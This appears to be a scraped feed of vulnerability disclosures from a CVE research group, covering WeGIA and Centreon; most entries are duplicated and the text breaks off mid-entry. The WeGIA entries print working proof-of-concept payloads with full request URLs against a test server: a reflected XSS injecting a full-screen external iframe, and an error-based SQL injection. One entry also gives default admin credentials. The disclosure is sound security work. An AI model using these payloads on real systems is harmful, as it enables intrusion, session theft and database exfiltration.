Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the <code>html/memorando/insere_despacho.php</code> file.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/memorando/insere_despacho.php</code></p> <p>Parameter: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"></</span><span class="nt">script</span><span class="p">><</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://js-dos.com/games/doom.exe.html"</span> <span class="na">style</span><span class="o">=</span><span class="s">"position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-of-url">Example of URL: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20bottom%3A0%3B%20right%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20margin%3A0%3B%20padding%3A0%3B%20overflow%3Ahidden%3B%20z-index%3A999999%3B%22%3E%3C%2Fiframe%3E </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce </h3><p style="text-align: justify;"> <ul> <li>The payload breaks out of the existing context (likely a JavaScript variable assignment) using <code>script tag</code> and injects an external iframe that covers the entire viewport.</li> </ul> </p><h2 id="cve-2026-23722-cross-site-scripting-xss-reflected-allows-arbitrary-code-execution-and-ui-redressing">CVE-2026-23722: Cross-Site Scripting (XSS) Reflected allows arbitrary code execution and UI redressing </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23722</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the WeGIA system, specifically within the <code>html/memorando/insere_despacho.php</code> file.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/memorando/insere_despacho.php</code></p> <p>Parameter: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"></</span><span class="nt">script</span><span class="p">><</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://js-dos.com/games/doom.exe.html"</span> <span class="na">style</span><span class="o">=</span><span class="s">"position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-of-url">Example of URL: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/html/memorando/insere_despacho.php?id_memorando=1%3C%2Fscript%3E%3Ciframe%20src%3D%22https%3A%2F%2Fjs-dos.com%2Fgames%2Fdoom.exe.html%22%20style%3D%22position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20bottom%3A0%3B%20right%3A0%3B%20width%3A100%25%3B%20height%3A100%25%3B%20border%3Anone%3B%20margin%3A0%3B%20padding%3A0%3B%20overflow%3Ahidden%3B%20z-index%3A999999%3B%22%3E%3C%2Fiframe%3E </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce </h3><p style="text-align: justify;"> <ul> <li>The payload breaks out of the existing context (likely a JavaScript variable assignment) using <code>script tag</code> and injects an external iframe that covers the entire viewport.</li> </ul> </p> <p><img src="/p/cve-2026-23722/image.png" width="1919" height="875" srcset="/p/cve-2026-23722/image_hu_bd7167f4b849a834.png 480w, /p/cve-2026-23722/image_hu_f207a24f416f7704.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="219" data-flex-basis="526px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g7hh-6qj7-mcqf</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/marcos-tolosa/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcos50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/marcos-tolosa/" target="_blank" rel="noopener" >Marcos Tolosa</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 16 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-23723/ https://www.cvehunters.com/p/cve-2026-23723/ <h2 id="cve-2026-23723-sql-injection-error-based-vulnerability-in-id_memorando-parameter-on-atendido_ocorrenciacontrole-endpoint">CVE-2026-23723: SQL Injection (Error-Based) Vulnerability in <code>id_memorando</code> Parameter on <code>Atendido_ocorrenciaControle</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23723</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An authenticated SQL Injection vulnerability was identified in the <code>Atendido_ocorrenciaControle</code> endpoint via the <code>id_memorando</code> parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>Atendido_ocorrenciaControle</code></p> <p>Parameter: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">1 AND extractvalue(1, concat(0x7e, @@Version)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-url">Example url: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle<span class="err">&</span>metodo=listarTodosComAnexo<span class="err">&</span>id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version)) </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Login to the WeGIA system (user:admin, password: wegia) and obtain a valid session cookie.</li> <li>The vulnerability was confirmed on the official security testing server: <code>sec.wegia.org:8000</code>.</li> <li>Send a GET request to the vulnerable endpoint with the following payload:</li> </ul> </p><h2 id="cve-2026-23723-sql-injection-error-based-vulnerability-in-id_memorando-parameter-on-atendido_ocorrenciacontrole-endpoint">CVE-2026-23723: SQL Injection (Error-Based) Vulnerability in <code>id_memorando</code> Parameter on <code>Atendido_ocorrenciaControle</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23723</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An authenticated SQL Injection vulnerability was identified in the <code>Atendido_ocorrenciaControle</code> endpoint via the <code>id_memorando</code> parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>Atendido_ocorrenciaControle</code></p> <p>Parameter: <code>id_memorando</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">1 AND extractvalue(1, concat(0x7e, @@Version)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-url">Example url: </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">https://sec.wegia.org:8000/WeGIA/controle/control.php?nomeClasse=Atendido_ocorrenciaControle<span class="err">&</span>metodo=listarTodosComAnexo<span class="err">&</span>id_memorando=1%20AND%20extractvalue(1,%20concat(0x7e,%20@@version)) </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Login to the WeGIA system (user:admin, password: wegia) and obtain a valid session cookie.</li> <li>The vulnerability was confirmed on the official security testing server: <code>sec.wegia.org:8000</code>.</li> <li>Send a GET request to the vulnerable endpoint with the following payload:</li> </ul> </p> <p><img src="/p/cve-2026-23723/image.png" width="1481" height="573" srcset="/p/cve-2026-23723/image_hu_50c6c393ec22c46a.png 480w, /p/cve-2026-23723/image_hu_ea035905a73cb2a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="258" data-flex-basis="620px" /></p> <p style="text-align: justify;"> <ul> <li>Observe that the system returns a error message, confirming the injection:</li> </ul> </p> <p><img src="/p/cve-2026-23723/image-1.png" width="681" height="32" srcset="/p/cve-2026-23723/image-1_hu_61812a024882cb4a.png 480w, /p/cve-2026-23723/image-1_hu_4211dac53e8c18cb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="2128" data-flex-basis="5107px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 16 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-12511/ https://www.cvehunters.com/p/cve-2025-12511/ <h2 id="cve-2025-12511-cross-site-scripting-xss-stored">CVE-2025-12511: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12511</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the DSM Administration’s Extensions configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p><h2 id="cve-2025-12511-cross-site-scripting-xss-stored">CVE-2025-12511: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12511" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12511</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the DSM Administration’s Extensions configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-12513/ https://www.cvehunters.com/p/cve-2025-12513/ <h2 id="cve-2025-12513-cross-site-scripting-xss-stored">CVE-2025-12513: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12513" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12513</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hosts configuration parameters page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p><h2 id="cve-2025-12513-cross-site-scripting-xss-stored">CVE-2025-12513: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12513" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12513</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hosts configuration parameters page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-12519/ https://www.cvehunters.com/p/cve-2025-12519/ <h2 id="cve-2025-12519-broken-access-control">CVE-2025-12519: Broken Access Control </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12519" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12519</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Information disclosure on Administration parameters API endpoint.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" ></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p><h2 id="cve-2025-12519-broken-access-control">CVE-2025-12519: Broken Access Control </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12519" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12519</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Information disclosure on Administration parameters API endpoint.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-13056/ https://www.cvehunters.com/p/cve-2025-13056/ <h2 id="cve-2025-13056-cross-site-scripting-xss-stored">CVE-2025-13056: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-13056" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-13056</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Administration ACL Menus configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p><h2 id="cve-2025-13056-cross-site-scripting-xss-stored">CVE-2025-13056: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-13056" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-13056</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Administration ACL Menus configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-15026/ https://www.cvehunters.com/p/cve-2025-15026/ <h2 id="cve-2025-15026-broken-access-control">CVE-2025-15026: Broken Access Control </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15026" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15026</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p><h2 id="cve-2025-15026-broken-access-control">CVE-2025-15026: Broken Access Control </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15026" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15026</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Missing Authentication for Critical Function vulnerability in Centreon Infra Monitoring centreon-awie (Awie import module) allows Accessing Functionality Not Properly Constrained by ACLs.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-15029/ https://www.cvehunters.com/p/cve-2025-15029/ <h2 id="cve-2025-15029-sql-injection">CVE-2025-15029: SQL Injection </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15029" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15029</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An unauthenticated user is able to introduce SQL Injection using the AWIE export module.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p><h2 id="cve-2025-15029-sql-injection">CVE-2025-15029: SQL Injection </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-15029" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-15029</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An unauthenticated user is able to introduce SQL Injection using the AWIE export module.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 05 Jan 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-12514/ https://www.cvehunters.com/p/cve-2025-12514/ <h2 id="cve-2025-12514-sql-injection">CVE-2025-12514: SQL Injection </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12514" 